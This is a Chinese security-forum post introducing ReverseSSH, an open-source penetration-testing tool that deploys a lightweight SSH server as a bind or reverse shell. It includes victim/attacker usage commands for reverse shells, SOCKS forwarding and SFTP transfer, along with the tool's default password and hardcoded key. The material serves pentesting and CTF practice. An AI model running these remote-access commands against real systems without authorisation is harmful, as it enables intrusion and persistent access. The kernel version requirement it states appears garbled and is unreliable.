安全矩阵

 找回密码
 立即注册
搜索
查看: 2395|回复: 0

ReverseSSH:带有反向Shell功能的静态链接SSH服务器

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-10-11 20:39:17 | 显示全部楼层 |阅读模式
原文链接:ReverseSSH:带有反向Shell功能的静态链接SSH服务器

关于ReverseSSH
ReverseSSH是一款功能强大的静态链接SSH服务器,ReverseSSH带有反向Shell功能,可以帮助广大研究人员提供强大的远程访问功能。该工具主要适用于渗透测试、HackTheBox挑战或CTF比赛等场景。
功能介绍

常见的Shell工具一般都缺少一些方便的功能,比如说完全交互式访问、Tab键补全或历史记录等。在ReverseSSH的帮助下,我们可以轻松在目标主机上部署一台轻量级SSH服务器(<1.5MB),并使用各种强大功能,比如说文件传输和端口转发等等。
ReverseSSH弥补渗透测试人员在目标设备初始访问点和本地权限提升操作之间的间隔距离,其主要优势如下:
完全交互式Shell访问;
通过SFTP实现文件传输功能;
本地/远程/动态端口转发;
可以当作绑定/反向Shell使用;
支持Unix和Windows操作系统;
工具要求
本工具的正常使用要求主机系统安装并配置好Golang环境。
系统要求
Linux:内核版本6.23或更高版本;
Windows:Windows Server 2008 R2或更高版本、Windows 7或更高版本;
编译环境要求
Golang 1.15;
upx(apt install upx-ucl);
工具安装广大研究人员可以使用下列命令将该项目源码克隆至本地,并进行项目构建:

git clone https://github.com/Fahrj/reverse-ssh.git
或者,可以直接访问该项目的【Releases页面】下载编译好的可执行文件。

工具使用当ReverseSSH运行之后,我们就可以使用任意用户名以及默认密码“letmeinbrudipls”来与服务器建立连接了。简而言之,我们可以直接将ReverseSSH当作一台SSH服务器来使用:
  1. # 完整交互式Shell访问
  2. ssh -p <RPORT> <RHOST>
  3. # 简单的命令执行
  4. ssh -p <RPORT> <RHOST> whoami
  5. # 完整的文件传输
  6. sftp -P <RPORT> <RHOST>
  7. # 端口9050上作为SOCKS代理的动态端口转发
  8. ssh -p <RPORT> -D 9050 <RHOST>
复制代码

绑定Shell场景
  1. # 目标主机
  2. victim$./reverse-ssh
  3. # 攻击者主机(默认密码: letmeinbrudipls)
  4. attacker$ssh -p 31337 <LHOST>
复制代码


反向Shell场景
  1. # 攻击者主机
  2. attacker$./reverse-ssh -l :<LPORT>
  3. # 目标主机
  4. victim$./reverse-ssh -p <LPORT> <LHOST>
  5. victim$./reverse-ssh <USER>@<LHOST>
  6. # 攻击者主机(默认密码: letmeinbrudipls)
  7. attacker$ssh -p 8888 127.0.0.1
  8. attacker$ssh target
复制代码

工具完整使用
  1. reverseSSH v1.1.0  Copyright (C) 2021  Ferdinor <ferdinor@mailbox.org>
  2. Usage: reverse-ssh [options] [<user>@]<target>
  3. Examples:
  4.   Bind:
  5.         reverse-ssh
  6.         reverse-ssh -v -l :4444
  7.   Reverse:
  8.         reverse-ssh 192.168.0.1
  9.         reverse-ssh kali@192.168.0.1
  10.         reverse-ssh -p 31337 192.168.0.1
  11.         reverse-ssh -v -b 0 kali@192.168.0.2
  12. Options:
  13.         -s, Shell to use for incoming connections, e.g. /bin/bash; (default: /bin/bash)
  14.                 for windows this can only be used to give a path to 'ssh-shellhost.exe' to
  15.                 enhance pre-Windows10 shells (e.g. '-s ssh-shellhost.exe' if in same directory)
  16.         -l, Bind scenario only: listen at this address:port (default: :31337)
  17.         -p, Reverse scenario only: ssh port at home (default: 22)
  18.         -b, Reverse scenario only: bind to this port after dialling home (default: 8888)
  19.         -v, Emit log output
  20. <target>
  21.         Optional target which enables the reverse scenario. Can be prepended with
  22.         <user>@ to authenticate as a different user than 'reverse' while dialling home.
  23. Credentials:
  24.         Accepting all incoming connections from any user with either of the following:
  25.          * Password "letmeinbrudipls"
  26.          * PubKey   "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlbJwr+ueQ0gojy4QWr2sUWcNC/Y9eV9RdY3PLO7Bk/ Brudi"
复制代码

项目地址ReverseSSH:【点击阅读原文】


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-22 19:39 , Processed in 0.012336 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表